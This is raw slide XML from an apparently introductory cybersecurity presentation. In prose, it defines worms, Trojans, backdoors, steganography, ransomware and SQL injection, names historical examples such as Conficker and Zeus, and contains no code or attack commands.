          <p:cNvPr id="463" name="Google Shape;463;p3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469" name="Google Shape;469;p3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470" name="Google Shape;470;p3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71" name="Google Shape;471;p3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472" name="Google Shape;472;p3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73" name="Google Shape;473;p3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74" name="Google Shape;474;p3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75" name="Google Shape;475;p3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76" name="Google Shape;476;p3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Worms</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Google Shape;477;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346168" y="2212086"/>
            <a:ext cx="17595663" cy="29314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Definition:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Worms are self-replicating malware that can spread independently, usually without user interaction. They exploit vulnerabilities in network services to replicate and spread across connected computers.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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Conficker Worm: First detected in 2008, Conficker exploited Windows vulnerabilities to spread through network shares and removable devices. It created a massive botnet and remained a significant threat for several years.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Google Shape;478;p3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484" name="Google Shape;484;p3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485" name="Google Shape;485;p3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486" name="Google Shape;486;p3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487" name="Google Shape;487;p3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488" name="Google Shape;488;p3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489" name="Google Shape;489;p3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490" name="Google Shape;490;p3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491" name="Google Shape;491;p3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Worm Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1145286"/>
            <a:ext cx="17595663"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Self-Replication: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Worms have the ability to create copies of themselves without requiring a host file. They can independently initiate the replication process and spread to other systems.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Network Propagation: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Worms typically spread through computer networks, exploiting vulnerabilities in network protocols or software. They can target connected devices without human intervention.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Autonomous Execution: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Once a worm infiltrates a system, it can independently execute and perform malicious activities. It doesn't rely on user interaction to activate its payload.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Exploitation of Vulnerabilities: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Worms often take advantage of security vulnerabilities in operating systems, applications, or network services to gain unauthorized access and spread to other systems.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493" name="Google Shape;493;p3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499" name="Google Shape;499;p3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500" name="Google Shape;500;p3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01" name="Google Shape;501;p3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502" name="Google Shape;502;p3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03" name="Google Shape;503;p3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04" name="Google Shape;504;p3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05" name="Google Shape;505;p3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06" name="Google Shape;506;p3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Worm Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="507" name="Google Shape;507;p39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1145286"/>
            <a:ext cx="17595663" cy="34171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Payload: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Worms may carry a payload, which is the malicious action or code they execute on infected systems. This can include data theft, system disruption, or the installation of additional malware.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Resource Consumption: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Some worms are designed to consume significant system resources, causing performance degradation or denial-of-service (DoS) conditions.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;508;p3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514" name="Google Shape;514;p4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515" name="Google Shape;515;p4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16" name="Google Shape;516;p4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517" name="Google Shape;517;p4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18" name="Google Shape;518;p4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19" name="Google Shape;519;p4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20" name="Google Shape;520;p4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21" name="Google Shape;521;p4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Stages of Worm Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;522;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1145286"/>
            <a:ext cx="17595663"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Infiltration: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worm exploits a vulnerability in a networked device to gain unauthorized access.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Replication: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worm creates copies of itself and attempts to spread to other vulnerable systems on the same network.</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Payload Activation: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worm activates its payload, which may include malicious activities such as data destruction, information theft, or unauthorized system access.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Network Propagation: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worm continues to spread across the network, targeting additional vulnerable systems.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Google Shape;523;p4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4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529" name="Google Shape;529;p4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530" name="Google Shape;530;p4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31" name="Google Shape;531;p4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532" name="Google Shape;532;p4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33" name="Google Shape;533;p4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34" name="Google Shape;534;p4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35" name="Google Shape;535;p4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36" name="Google Shape;536;p4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TROJANS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Google Shape;537;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1145286"/>
            <a:ext cx="17595663"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Definition:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t>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Trojan, short for Trojan horse, is a type of malicious software or malware that disguises itself as something legitimate or benign but actually contains malicious code.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Example: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Zeus Trojan (Zbot):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Description:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Zeus is a notorious Trojan designed to steal sensitive financial information, particularly online banking credentials.</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Method of Attack:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> It often spreads through malicious email attachments or links, and once on a system, it can capture login credentials by keylogging or injecting malicious code into banking websites.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538" name="Google Shape;538;p4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3" name="Google Shape;123;p1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4" name="Google Shape;124;p1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5" name="Google Shape;125;p1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6" name="Google Shape;126;p1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7" name="Google Shape;127;p1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8" name="Google Shape;128;p1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29" name="Google Shape;129;p1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0" name="Google Shape;130;p1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ATTACKS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1448802" y="3468243"/>
            <a:ext cx="8089165" cy="19598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Attacks encompass a broad range of malicious activities that aim to compromise the confidentiality, integrity, or availability of computer systems, networks, and data. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p1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
        <p:nvSpPr>
          <p:cNvPr id="133" name="Google Shape;133;p15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10609118" y="2371725"/>
            <a:ext cx="6650182" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6650182" h="4114800" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6650182" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6650182" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>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4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544" name="Google Shape;544;p4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545" name="Google Shape;545;p4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46" name="Google Shape;546;p4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547" name="Google Shape;547;p4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48" name="Google Shape;548;p4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49" name="Google Shape;549;p4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50" name="Google Shape;550;p4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51" name="Google Shape;551;p4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TROJAN Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1145286"/>
            <a:ext cx="17595663" cy="87607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Disguise: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Trojans disguise themselves as legitimate and often desirable software. This could include fake antivirus programs, games, or utility tools.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No Self-Replication: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Trojans do not have the ability to self-replicate like viruses or worms. Their distribution depends on users downloading and executing the malicious program.</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Social Engineering:</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Trojans rely on social engineering techniques to trick users. This might involve enticing users with seemingly harmless or beneficial software, often distributed through email attachments, fake download links, or malicious websites.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Payload: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Trojans carry a malicious payload that can include a wide range of activities, such as stealing sensitive information, providing unauthorized access to the system, or installing additional malware.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553" name="Google Shape;553;p4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4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559" name="Google Shape;559;p4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560" name="Google Shape;560;p4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61" name="Google Shape;561;p4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562" name="Google Shape;562;p4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63" name="Google Shape;563;p4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64" name="Google Shape;564;p4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65" name="Google Shape;565;p4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66" name="Google Shape;566;p4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TROJAN Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Google Shape;567;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1145286"/>
            <a:ext cx="17595663" cy="34171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Backdoor Access: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Many Trojans create a backdoor on the infected system, allowing remote attackers to gain unauthorized access and control over the compromised device.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Diverse Functionality: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Trojans can be versatile and have various functionalities, depending on their intended purpose. Common types include banking Trojans, remote access Trojans (RATs), and keyloggers.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Google Shape;568;p4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574" name="Google Shape;574;p4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575" name="Google Shape;575;p4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76" name="Google Shape;576;p4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577" name="Google Shape;577;p4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78" name="Google Shape;578;p4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79" name="Google Shape;579;p4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80" name="Google Shape;580;p4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81" name="Google Shape;581;p4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Stages of TROJAN Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1145286"/>
            <a:ext cx="1759566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Infiltration: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Trojan disguises itself as a legitimate program and is typically distributed through deceptive means, such as email attachments, fake software downloads, or malicious websites.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Execution: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Once the Trojan is executed by the user, it may perform actions in the background, such as installing additional malware, creating backdoors, or initiating malicious processes.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Payload Activation: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Trojan's payload is activated, carrying out the specific malicious activities it was designed for. This could involve data theft, system manipulation, or providing unauthorized access.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Silent Operation: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Trojans often operate silently, trying to avoid detection by antivirus software or other security measures.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583;p4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4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589" name="Google Shape;589;p4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590" name="Google Shape;590;p4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591" name="Google Shape;591;p4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592" name="Google Shape;592;p4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593" name="Google Shape;593;p4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594" name="Google Shape;594;p4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595" name="Google Shape;595;p4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596" name="Google Shape;596;p4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BACKDOORS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1383411"/>
            <a:ext cx="17595663" cy="29314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backdoor is a type of malicious software or unauthorized access method that provides remote access to a computer system while bypassing normal authentication processes.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Backdoors are often created and utilized by attackers to maintain unauthorized access to a compromised system, allowing them to control the system, steal information, or execute additional malicious activities.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Google Shape;598;p4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604" name="Google Shape;604;p4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605" name="Google Shape;605;p4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06" name="Google Shape;606;p4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607" name="Google Shape;607;p4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08" name="Google Shape;608;p4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09" name="Google Shape;609;p4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10" name="Google Shape;610;p4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11" name="Google Shape;611;p4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BACKDOORS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="Google Shape;612;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1383411"/>
            <a:ext cx="17595663"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Unauthorized Access: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Backdoors provide a secret entry point into a system, allowing attackers to gain unauthorized access without going through typical authentication mechanisms.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Persistence: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Backdoors are designed to remain on a system for an extended period without being easily detected or removed. They often use techniques to ensure their continued presence, such as hiding in system files or processes.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Remote Control:</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Backdoors enable remote control of the compromised system. Attackers can issue commands, upload/download files, and perform various actions without the user's knowledge.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Stealth:</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Backdoors are often designed to operate quietly and evade detection by security tools. They may use encryption, polymorphic code, or rootkit techniques to hide their presence.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613" name="Google Shape;613;p4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4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619" name="Google Shape;619;p4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620" name="Google Shape;620;p4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21" name="Google Shape;621;p4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622" name="Google Shape;622;p4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23" name="Google Shape;623;p4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24" name="Google Shape;624;p4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25" name="Google Shape;625;p4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26" name="Google Shape;626;p4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Characteristics of BACKDOORS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="627" name="Google Shape;627;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1383411"/>
            <a:ext cx="17595663" cy="24456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Command and Control (C2):</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Backdoors typically communicate with a remote server controlled by the attacker. This server, known as the command and control server, allows the attacker to send instructions and receive data from the compromised system.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="628" name="Google Shape;628;p4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4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634" name="Google Shape;634;p4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635" name="Google Shape;635;p4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36" name="Google Shape;636;p4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637" name="Google Shape;637;p4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38" name="Google Shape;638;p4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39" name="Google Shape;639;p4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40" name="Google Shape;640;p4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41" name="Google Shape;641;p4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Stages of BACKDOOR Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="642" name="Google Shape;642;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1383411"/>
            <a:ext cx="17595663"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Delivery:</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backdoor is delivered to the target system. This can occur through various methods such as email attachments, malicious links, or exploitation of software vulnerabilities.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Installation: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Once delivered, the backdoor needs to be installed on the target system. This may involve exploiting software vulnerabilities, social engineering to trick the user into executing the malicious code, or leveraging other malware as a delivery mechanism.</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Establishment of Communication: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backdoor establishes communication with the attacker's command and control server. This connection allows the attacker to remotely control the compromised system and send/receive instructions.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643" name="Google Shape;643;p4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4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649" name="Google Shape;649;p4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650" name="Google Shape;650;p4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51" name="Google Shape;651;p4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652" name="Google Shape;652;p4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53" name="Google Shape;653;p4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54" name="Google Shape;654;p4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55" name="Google Shape;655;p4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56" name="Google Shape;656;p4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Stages of BACKDOOR Attack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="657" name="Google Shape;657;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1383411"/>
            <a:ext cx="17595663" cy="53602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Persistence:</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backdoor takes steps to ensure its persistence on the system, making it challenging to remove. This could involve modifying system settings, creating hidden files, or integrating with legitimate processes.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Remote Control and Malicious Activities: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With the backdoor in place, the attacker can remotely control the compromised system. This control is often used to steal sensitive information, execute additional malicious activities, or serve as a foothold for more extensive attacks.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="Google Shape;658;p4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5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664" name="Google Shape;664;p5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665" name="Google Shape;665;p5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66" name="Google Shape;666;p5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667" name="Google Shape;667;p5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68" name="Google Shape;668;p5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69" name="Google Shape;669;p5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70" name="Google Shape;670;p5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71" name="Google Shape;671;p5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STEGANOGRAPHY</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="672" name="Google Shape;672;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1383411"/>
            <a:ext cx="17595663" cy="19598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Steganography is the practice of concealing messages, information, or files within other non-secret data, making it difficult for unintended recipients to detect the presence of the hidden information. Unlike encryption, which focuses on keeping the content of a message secret, steganography is more concerned with hiding the existence of the message itself.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Google Shape;673;p5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5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679" name="Google Shape;679;p5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680" name="Google Shape;680;p5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81" name="Google Shape;681;p5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682" name="Google Shape;682;p5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83" name="Google Shape;683;p5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84" name="Google Shape;684;p5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685" name="Google Shape;685;p5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686" name="Google Shape;686;p5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STEGANOGRAPHY works?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="687" name="Google Shape;687;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1383411"/>
            <a:ext cx="17595663" cy="58460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Carrier Medium:</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Description: The carrier medium is the file or data in which the secret information is concealed. It could be an image, audio file, or any other type of digital content.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Hidden Information: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Description: The information to be concealed is embedded within the carrier medium. This hidden information could be text, images, files, or other data.</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Stego Key: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Description: Some steganographic techniques may require a stego key, which is a secret key or password used to embed or extract the hidden information. This adds an additional layer of security.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="688" name="Google Shape;688;p5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9" name="Google Shape;139;p1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0" name="Google Shape;140;p1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1" name="Google Shape;141;p1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2" name="Google Shape;142;p1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3" name="Google Shape;143;p1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4" name="Google Shape;144;p1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5" name="Google Shape;145;p1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6" name="Google Shape;146;p1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ATTACKS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Google Shape;147;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909052" y="1257301"/>
            <a:ext cx="16915665"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Ransomware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Definition: Encrypts files or systems and demands a ransom for their release.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NotPetya (2017): Ransomware that caused widespread disruption, particularly in Ukraine, by encrypting systems.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CryptoLocker (2013): Early prominent ransomware that demanded payment in cryptocurrency.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SQL Injection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Definition: Exploits vulnerabilities in web applications by injecting malicious SQL code.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Heartland Payment Systems (2008): A major data breach resulting from SQL injection led to the compromise of millions of credit card details.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Sony Pictures (2014): SQL injection played a role in the breach that exposed sensitive company data.</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148" name="Google Shape;148;p1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5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694" name="Google Shape;694;p5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695" name="Google Shape;695;p5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696" name="Google Shape;696;p5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697" name="Google Shape;697;p5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698" name="Google Shape;698;p5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699" name="Google Shape;699;p5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700" name="Google Shape;700;p5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701" name="Google Shape;701;p5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STEGANOGRAPHY </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="702" name="Google Shape;702;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1383411"/>
            <a:ext cx="17595663"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Image Steganography:</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Description:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Concealing information within images is one of the most common forms of steganography. In digital images, slight modifications to pixel values or color channels may go unnoticed by the human eye but can be used to encode hidden data.</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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> A common technique involves hiding text within the least significant bits of an image's pixels. To the casual observer, the image appears unchanged, but the hidden text can be extracted using steganography tools.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Audio Steganography:</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Description:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Similar to image steganography, audio steganography hides information within audio files. This can be achieved by modifying certain parameters or embedding data in the audio signal.</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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> In audio steganography, secret messages may be encoded in the frequency or amplitude of the sound wave. A listener might not perceive any difference, but the hidden information can be extracted with specialized tools.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="703" name="Google Shape;703;p5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5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709" name="Google Shape;709;p5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710" name="Google Shape;710;p5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711" name="Google Shape;711;p5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712" name="Google Shape;712;p5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713" name="Google Shape;713;p5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714" name="Google Shape;714;p5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715" name="Google Shape;715;p5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716" name="Google Shape;716;p5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STEGANOGRAPHY </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717" name="Google Shape;717;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346167" y="1383411"/>
            <a:ext cx="1759566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Text Steganography:</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Description:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Concealing information within text is less common but still possible. This can involve using special characters, whitespace, or other subtle modifications to encode a hidden message.</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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Using invisible ink or whitespace characters within a text document to convey a hidden message. To the naked eye, the document appears normal, but with the right tools or knowledge, the hidden information becomes visible.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Video Steganography:</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Description:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Similar to image and audio steganography, video steganography hides information within video files. This could involve manipulating frames, color channels, or other aspects of the video.</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Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="212121"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed"/>
                <a:ea typeface="Roboto Condensed"/>
                <a:cs typeface="Roboto Condensed"/>
                <a:sym typeface="Roboto Condensed"/>
              </a:rPr>
              <a:t> Modifying the color values of specific frames in a video to encode binary data. The changes are subtle and imperceptible to human viewers, but the hidden information can be extracted using steganography techniques.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="718" name="Google Shape;718;p5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5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724" name="Google Shape;724;p5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725" name="Google Shape;725;p5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726" name="Google Shape;726;p5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727" name="Google Shape;727;p5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728" name="Google Shape;728;p5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729" name="Google Shape;729;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="2602676"/>
            <a:ext cx="5972400" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5972400" h="4114800" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5972400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5972400" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4114800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill rotWithShape="1">
            <a:blip r:embed="rId5">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="730" name="Google Shape;730;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11114562" y="2602676"/>
            <a:ext cx="5972400" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
